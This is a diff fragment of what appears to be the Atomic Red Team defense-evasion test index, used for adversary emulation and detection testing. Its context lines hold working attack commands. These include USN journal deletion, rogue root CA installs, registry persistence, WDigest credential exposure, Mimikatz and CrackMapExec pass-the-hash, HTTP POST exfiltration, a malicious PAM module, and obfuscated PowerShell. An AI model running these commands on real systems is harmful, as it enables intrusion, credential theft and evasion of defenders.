supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} -' + ' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: @@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux @@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ -' + ' supported_platforms: - windows input_arguments: @@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" -' + ' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null -' + ' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } -' + ' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} -' + ' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' -' + ' name: powershell T1036.004: technique: @@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) -' + ' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" -' + ' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) -' + ' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own MSI" -' + ' executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" -' + ' name: command_prompt T1564.004: technique: @@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore -' + ' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 -' + ' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null -' + ' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore -' + ' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete -' + ' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} -' + ' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. -' + ' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe -' + ' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" -' + ' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} -' + ' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) -' + ' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. -' + ' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} -' + ' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: 